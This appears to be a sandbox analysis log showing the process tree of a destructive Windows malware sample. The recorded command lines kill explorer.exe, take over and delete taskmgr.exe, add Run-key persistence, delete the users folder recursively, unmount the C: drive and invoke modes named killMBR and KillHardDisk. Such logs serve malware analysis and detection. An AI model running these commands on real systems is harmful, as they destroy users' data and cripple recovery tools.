        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        11⤵
        
        PID:5356
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        12⤵
        Kills process with taskkill
        
        PID:3276
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        6⤵
        
        PID:6896
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        7⤵
        Kills process with taskkill
        
        PID:8580
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe /autoup 1698005182
        6⤵
        
        PID:10124
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe /autoup 1698005182
        7⤵
        Adds Run key to start application
        
        PID:6212
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe /killwindows 1698005182
        6⤵
        
        PID:9640
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe /killwindows 1698005182
        7⤵
        
        PID:9852
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        8⤵
        
        PID:6124
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        9⤵
        Modifies file permissions
        
        PID:10556
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Cacls C:\windows\system32\taskmgr.exe /t /e /c /gAdmin:F
        8⤵
        
        PID:15612
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe /KillHardDisk 1698005182
        6⤵
        
        PID:10860
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe /KillHardDisk 1698005182
        7⤵
        
        PID:7096
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        8⤵
        
        PID:13080
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c mountvol c: /d
        8⤵
        
        PID:13364
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe /killMBR 1698005182
        6⤵
        
        PID:12996
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe /killMBR 1698005182
        7⤵
        
        PID:10552
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe /protect 1698005182
        6⤵
        
        PID:2980
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe /protect 1698005182
        7⤵
        
        PID:14684
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe /autoup 1698005182
        6⤵
        
        PID:15016
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe /autoup 1698005182
        7⤵
        
        PID:15612
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc309.exe 1698005182
      4⤵
      PID:4116
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe+99652.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc309.exe
      4⤵
      PID:4784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe /save 1698005182
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2984
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe /save 1698005182
    3⤵
    PID:3612
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe /protect 1698005182
  2⤵
  PID:3304
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe /protect 1698005182
    3⤵
    PID:3896
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe+417541.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc304.exe
      4⤵
      PID:3932
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc304.exe 1698005182
      4⤵
      PID:7104
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc304.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc304.exe 1698005182
        5⤵
        Executes dropped EXE
        
        PID:7276
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc304.exe /autoup 1698005182
        6⤵
        
        PID:1768
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc304.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc304.exe /autoup 1698005182
        7⤵
        Adds Run key to start application
        
        PID:8428
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc304.exe /killwindows 1698005182
        6⤵
        
        PID:1636
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc304.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc304.exe /killwindows 1698005182
        7⤵
        
        PID:11000
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        8⤵
        
        PID:11820
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        9⤵
        Modifies file permissions
        
        PID:14256
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del /f C:\windows\system32\taskmgr.exe
        8⤵
        
        PID:15996
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc304.exe /KillHardDisk 1698005182
        6⤵
        
        PID:11432
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc304.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc304.exe /KillHardDisk 1698005182
        7⤵
        
        PID:13156
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        8⤵
        
        PID:14616
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c mountvol c: /d
        8⤵
        
        PID:15056
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc304.exe /killMBR 1698005182
        6⤵
        
        PID:13852
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc304.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc304.exe /killMBR 1698005182
        7⤵
        
        PID:12660
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc304.exe /KillHardDisk 1698005182
        6⤵
        
        PID:5672
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe+54371.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe
      4⤵
      PID:8004
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe 1698005182
      4⤵
      PID:8984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe /protect 1698005182
  2⤵
  PID:4564
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe /protect 1698005182
    3⤵
    PID:5436
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe+412224.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc304.exe
      4⤵
      PID:3240
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe 1698005182
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2064
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe+16270.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe
      4⤵
      PID:5968
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc304.exe 1698005182
      4⤵
      PID:8976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe /save 1698005182
  2⤵
  PID:5656
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe /save 1698005182
    3⤵
    PID:5924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe /protect 1698005182
  2⤵
  PID:6032
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe /protect 1698005182
    3⤵
    PID:6052
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc300.exe 1698005182
      4⤵
      PID:9156
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe /save 1698005182
  2⤵
  PID:3308
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe /save 1698005182
  2⤵
  PID:6668
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe /save 1698005182
    3⤵
    PID:6744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
  2⤵
  PID:7320
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im explorer.exe
    3⤵
    - Kills process with taskkill
    PID:8564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe /autoup 1698005182
  2⤵
  PID:5972
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe /autoup 1698005182
    3⤵
    - Adds Run key to start application
    PID:10152
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe /killwindows 1698005182
  2⤵
  PID:9400
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe /killwindows 1698005182
    3⤵
    PID:6960
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
      4⤵
      PID:11056
    - - C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        5⤵
        Modifies file permissions
        
        PID:12952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe /KillHardDisk 1698005182
  2⤵
  PID:10652
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe /KillHardDisk 1698005182
    3⤵
    PID:9420
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c del C:\users /r /f
      4⤵
      PID:13064
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c mountvol c: /d
      4⤵
      PID:15124
    - - C:\Windows\system32\mountvol.exe
        
        mountvol c: /d
        5⤵
        
        PID:13544
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe /killMBR 1698005182
  2⤵
  PID:12960
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe /killMBR 1698005182
    3⤵
    PID:5580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe /protect 1698005182
  2⤵
  PID:3432
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe /protect 1698005182
    3⤵
    PID:224

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
- Suspicious use of WriteProcessMemory
PID:4408

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:4676
- C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe
  C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /save 1698005182
  2⤵
  - Executes dropped EXE
  PID:2700

C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe
C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /save 1698005182
1⤵
- Executes dropped EXE
PID:5444

C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc309.exe
C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc309.exe 1698005182
1⤵
- Executes dropped EXE
PID:5272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc309.exe /protect 1698005182
  2⤵
  PID:5772
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc309.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc309.exe /protect 1698005182
    3⤵
    PID:6420
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc309.exe+416496.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3094.exe
      4⤵
      PID:6940
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3094.exe 1698005182
      4⤵
      PID:7416
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3094.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3094.exe 1698005182
        5⤵
        Executes dropped EXE
        
        PID:8516
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3094.exe /autoup 1698005182
        6⤵
        
        PID:3832
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3094.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3094.exe /autoup 1698005182
        7⤵
        
        PID:6540
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3094.exe /killwindows 1698005182
        6⤵
        
        PID:10508
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3094.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3094.exe /killwindows 1698005182
        7⤵
        
        PID:12072
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        8⤵
        
        PID:14932
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        9⤵
        Modifies file permissions
        
        PID:14400
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3094.exe /KillHardDisk 1698005182
        6⤵
        
        PID:12668
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3094.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3094.exe /KillHardDisk 1698005182
        7⤵
        
        PID:1120
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        8⤵
        
        PID:15772
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c mountvol c: /d
        8⤵
        
        PID:13980
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3094.exe /killMBR 1698005182
        6⤵
        
        PID:15008
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3094.exe /protect 1698005182
        6⤵
        
        PID:5036
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3097.exe 1698005182
      4⤵
      PID:9976
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3097.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3097.exe 1698005182
        5⤵
        
        PID:5920
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        6⤵
        
        PID:3496
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        7⤵
        Kills process with taskkill
        
        PID:3440
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3097.exe /autoup 1698005182
        6⤵
        
        PID:5108
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3097.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3097.exe /autoup 1698005182
        7⤵
        
        PID:3096
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3097.exe /killwindows 1698005182
        6⤵
        
        PID:11668
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3097.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3097.exe /killwindows 1698005182
        7⤵
        
        PID:12872
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        8⤵
        
        PID:8560
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        9⤵
        Modifies file permissions
        
        PID:13824
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3097.exe /KillHardDisk 1698005182
        6⤵
        
        PID:14308
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3097.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3097.exe /KillHardDisk 1698005182
        7⤵
        
        PID:13948
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        8⤵
        
        PID:10868
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cpoy C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3097.exe C:\windows\system32\taskmgr.exe
        6⤵
        
        PID:1772
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc309.exe+727931.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3097.exe
      4⤵
      PID:8952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc309.exe /save 1698005182
  2⤵
  PID:6904
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc309.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc309.exe /save 1698005182
    3⤵
    - Executes dropped EXE
    PID:7248
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
  2⤵
  PID:7424
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im explorer.exe
    3⤵
    - Kills process with taskkill
    PID:8844
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc309.exe /autoup 1698005182
  2⤵
  PID:7644
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc309.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc309.exe /autoup 1698005182
    3⤵
    - Adds Run key to start application
    PID:8136
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:8620
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc309.exe /killwindows 1698005182
  2⤵
  PID:6284
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc309.exe /KillHardDisk 1698005182
  2⤵
  PID:6664
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc309.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc309.exe /KillHardDisk 1698005182
    3⤵
    PID:11756
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c del C:\users /r /f
      4⤵
      PID:12480
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc309.exe /killMBR 1698005182
  2⤵
  PID:12380
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc309.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc309.exe /killMBR 1698005182
    3⤵
    PID:14240
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc309.exe /protect 1698005182
  2⤵
  PID:14776
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc309.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc309.exe /protect 1698005182
    3⤵
    PID:16316
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc309.exe /autoup 1698005182
  2⤵
  PID:13880

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:912

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3059.exe /protect 1698005182
1⤵
PID:5152
- C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3059.exe
  C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3059.exe /protect 1698005182
  2⤵
  - Executes dropped EXE
  PID:5796
